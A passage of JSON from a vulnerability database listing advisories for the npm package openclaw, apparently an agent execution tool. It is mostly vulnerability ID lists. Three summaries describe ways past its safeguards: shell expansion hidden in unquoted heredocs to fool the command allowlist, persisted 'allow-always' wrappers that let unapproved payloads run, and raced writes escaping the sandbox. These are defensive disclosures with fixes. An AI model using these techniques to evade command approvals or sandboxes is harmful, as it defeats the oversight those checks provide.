"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-2rqg-gjgv-84jm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kcba-tshp-77d6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95751?format=json","vulnerability_id":"VCID-kcy2-a98b-uyg7","summary":"OpenClaw's exec allowlist analysis rejects shell expansion in unquoted heredocs\n## Summary\nExec allowlist analysis rejects shell expansion in unquoted heredocs\n\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nAn allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime.\n\n## Fix\nThe exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text.\n\n## Fix Commit(s)\n- b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx"},{"reference_url":"https://github.com/advisories/GHSA-x3h8-jrgh-p8jx","reference_id":"GHSA-x3h8-jrgh-p8jx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x3h8-jrgh-p8jx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["GHSA-x3h8-jrgh-p8jx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kcy2-a98b-uyg7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91131?format=json","vulnerability_id":"VCID-kh1q-871c-zkfa","summary":"Duplicate Advisory: OpenClaw's allow-always wrapper persistence could bypass future approvals and enable command execution\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-6j27-pc5c-m8w8. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an authorization bypass vulnerability in allow-always wrapper persistence that allows attackers to bypass approval checks by persisting wrapper-level allowlist entries instead of validating inner executable intent. Remote attackers can approve benign wrapped system.run commands and subsequently execute different payloads without approval, enabling remote code execution on gateway and node-host execution flows.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/24c954d972400f508814532dea0e4dcb38418bb0","reference_id":"","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/24c954d972400f508814532dea0e4dcb38418bb0"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allow-always-wrapper-persistence","reference_id":"","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allow-always-wrapper-persistence"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29607","reference_id":"CVE-2026-29607","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29607"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6j27-pc5c-m8w8","reference_id":"GHSA-6j27-pc5c-m8w8","reference_type":"","scores":[{"value":"6.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6j27-pc5c-m8w8"},{"reference_url":"https://github.com/advisories/GHSA-pfv5-rpcw-x34x","reference_id":"GHSA-pfv5-rpcw-x34x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pfv5-rpcw-x34x"}],"fixed_packages":[],"aliases":["GHSA-pfv5-rpcw-x34x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kh1q-871c-zkfa"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91060?format=json","vulnerability_id":"VCID-kh5u-hg46-3qha","summary":"OpenClaw: Sandbox staged writes could escape the verified parent directory before commit\n## Summary\nIn affected versions of `openclaw`, sandbox fs-bridge writes validated the destination before commit, but temporary file creation and population were not pinned to a verified parent directory. A raced parent-path alias change could cause the staged temp file to be created outside the intended writable mount before the final guarded replace step.\n\n## Impact\nThis is a sandbox boundary bypass affecting integrity and availability within the writable mount scope. Attacker-controlled bytes could be written outside the intended validated path before the final guarded step ran.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe older staging flow created and wrote the temporary file using target-directory shell path operations before the final replace step revalidated the destination. That meant the last guard protected only the final rename, not the earlier temp-file materialization path.\n\n## Fix\nOpenClaw now resolves a pinned mount root plus relative parent path, creates the temporary file inside the verified parent directory, and performs the final atomic replace from that pinned directory context. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj4p-rc52-m843","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mj4p-rc52-m843"},{"reference_url":"https://github.com/advisories/GHSA-mj4p-rc52-m843","reference_id":"GHSA-mj4p-rc52-m843","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mj4p-rc52-m843"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-k